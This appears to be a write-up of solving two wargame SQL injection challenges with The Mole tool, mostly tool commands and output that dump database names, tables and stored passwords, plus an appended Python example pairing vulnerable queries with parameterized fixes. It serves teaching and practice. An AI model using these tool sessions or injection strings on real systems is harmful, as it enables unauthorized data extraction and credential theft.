The Mole

I came across a SQL injection tool, so here is a short write-up of using it.

The Mole (Digging up your data) : http://themole.nasel.com.ar/

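As the target, I'll use the WeChall challenge that asks you to find a table name, and solve it with this tool.
After launching it, pressing the Tab key shows the various options you can set.
There are so many options that it looks usable in a very wide range of situations.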

C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
                     _____ _           ___  ___      _
                    |_   _| |          |  \/  |     | |
                      | | | |__   ___  | .  . | ___ | | ___
                      | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
                      | | | | | |  __/ | |  | | (_) | |  __/
                      \_/ |_| |_|\___| \_|  |_/\___/|_|\___|

 Developed by Nasel(http://www.nasel.com.ar).
 Published under GPLv3.
 Be efficient and have fun!

#> url http://www.wechall.net/challenge/table_names/challenge.php?username=test&password=test&login=login
#> needle Welcome
#> injectable_field GET username
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[+] Found separator: "'"
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 3
[+] Trying finger 1/2
[+] Injectable fields found: [1, 3]
[i] Trying to inject in field 1
[+] Found injectable field: 1
[+] Using string union technique.
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------------+
| Databases          |
+--------------------+
| gizmore_tableu61   |
| information_schema |
+--------------------+
#> tables gizmore_tableu61
[+] Rows: 2
[*] Dumped 2/2 rows.
+--------------+
| Tables       |
+--------------+
| aaawrong     |
| usertableus4 |
+--------------+
#> columns gizmore_tableu61 aaawrong
[+] Rows: 2
[*] Dumped 2/2 rows.
+----------------------------+
| Columns for table aaawrong |
+----------------------------+
| test                       |
| username                   |
+----------------------------+
#> query gizmore_tableu61 aaawrong test,username
+-----------------+
| test | username |
+-----------------+
+-----------------+
#> columns gizmore_tableu61 usertableus4
[+] Rows: 3
[*] Dumped 3/3 rows.
+--------------------------------+
| Columns for table usertableus4 |
+--------------------------------+
| message                        |
| password                       |
| username                       |
+--------------------------------+
#> query gizmore_tableu61 usertableus4 message,password,username
[+] Rows: 5
[*] Dumped 5/5 rows.
+------------------------------------------------------------------------------------------+
| message                                                            | password | username |
+------------------------------------------------------------------------------------------+
| Hello Peter><thismypass><Aaron A. Aaronson             |
| Let`s have a bbq!><tamethepenguin><quangntenemy        |
| This is a demo account, nothing here.><test><test      |
| WTF><tables><nancy                                     |
| Welcome Back><themoreyouknowthemoreyoucanforget><Admin |
+------------------------------------------------------------------------------------------+
#>

While I'm at it, I'll solve a wargame.kr challenge as well. This one requires sending the parameter via POST.

C:\Users\ByJJoon\Downloads\themole-0.2.6>mole.exe
                     _____ _           ___  ___      _
                    |_   _| |          |  \/  |     | |
                      | | | |__   ___  | .  . | ___ | | ___
                      | | | '_ \ / _ \ | |\/| |/ _ \| |/ _ \
                      | | | | | |  __/ | |  | | (_) | |  __/
                      \_/ |_| |_|\___| \_|  |_/\___/|_|\___|

 Developed by Nasel(http://www.nasel.com.ar).
 Published under GPLv3.
 Be efficient and have fun!

#> url http://wargame.kr:8084/prob/9/chk.php
#> method POST idx=1532
#> needle 2011-12-12 18:24:17
#> injectable_field POST idx
#> schemas
[i] Trying injection using 0 parenthesis.
[i] Trying separator: "'"
[i] Trying separator: """
[i] Trying separator: " "
[+] Found separator: " "
[i] Trying DBMS Mysql
[+] Found DBMS: Mysql
[i] Trying injection using 0 parenthesis.
[i] Trying injection using comment: #
[+] Found comment delimiter: "#"
[+] Query columns count: 1
[+] Trying finger 1/2
[+] Trying finger 2/2
[-] Could not find injectable field.
[+] Using blind mode.
[+] Found row count: 2
[+] Guessed length: 18
information_schema
[+] Guessed length: 11
p9_blueh4g3
+--------------------+
| Databases          |
+--------------------+
| information_schema |
| p9_blueh4g3        |
+--------------------+
#> tables p9_blueh4g3
[+] Found row count: 2
[+] Guessed length: 11
admin_table
[+] Guessed length: 8
ip_table
+-------------+
| Tables      |
+-------------+
| admin_table |
| ip_table    |
+-------------+
#> columns p9_blueh4g3 admin_table
[+] Found row count: 3
[+] Guessed length: 3
idx
[+] Guessed length: 2
id
[+] Guessed length: 2
ps
+-------------------------------+
| Columns for table admin_table |
+-------------------------------+
| id                            |
| idx                           |
| ps                            |
+-------------------------------+
#> query p9_blueh4g3 admin_table id,idx,ps
[+] Found row count: 1
[+] Guessed length: 25
blue_admin><1><0h~myp4ss!
+-------------------------------+
| id         | idx | ps         |
+-------------------------------+
| blue_admin | 1   | 0h~myp4ss! |
+-------------------------------+
#>

This is a seriously scary tool.
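
The two sessions above report different separators: "'" for the GET username field and " " for the POST idx field, so one input lands inside a quoted string and the other in a bare numeric position. As an added example (not from the original post; SQLite stands in for the MySQL targets, and the table names and data are constructed), here is each context in its vulnerable form beside the parameterized fix:

```python
import re
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(username TEXT, password TEXT);
        INSERT INTO users VALUES ('test', 'test'), ('admin', 's3cret');
        CREATE TABLE visits(idx INTEGER, seen TEXT);
        INSERT INTO visits VALUES (1532, '2011-12-12 18:24:17'),
                                  (1533, '2011-12-13 09:00:00');
    """)
    return db

def login_vulnerable(db, username, password):
    # String context: the value sits between quotes, so a "'" ends the literal
    # and the rest of the input is parsed as SQL.
    sql = ("SELECT username FROM users "
           "WHERE username = '%s' AND password = '%s'" % (username, password))
    return db.execute(sql).fetchall()

def login_safe(db, username, password):
    # Bound parameters travel as data and are never parsed as SQL.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()

def lookup_vulnerable(db, idx):
    # Numeric context: there is no quote to break out of, so escaping quotes
    # (done here) gives no protection at all.
    idx = idx.replace("'", "''")
    return db.execute("SELECT seen FROM visits WHERE idx = " + idx).fetchall()

def lookup_safe(db, idx):
    # Accept only a plain decimal integer, then bind it.
    if not re.fullmatch(r"[0-9]{1,9}", idx):
        raise ValueError("idx must be an integer")
    return db.execute("SELECT seen FROM visits WHERE idx = ?",
                      (int(idx),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    quote_input = "' OR 1=1 -- "  # SQLite comment; the MySQL target used "#"
    print(login_vulnerable(db, quote_input, "x"))   # every user row comes back
    print(login_safe(db, quote_input, "x"))         # no rows
    print(lookup_vulnerable(db, "0 OR 1=1"))        # every visit row comes back
    print(lookup_safe(db, "1532"))                  # only the requested row
```

The numeric case is the one that quote-escaping filters miss, which is why the idx field was still injectable with a plain space as separator.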
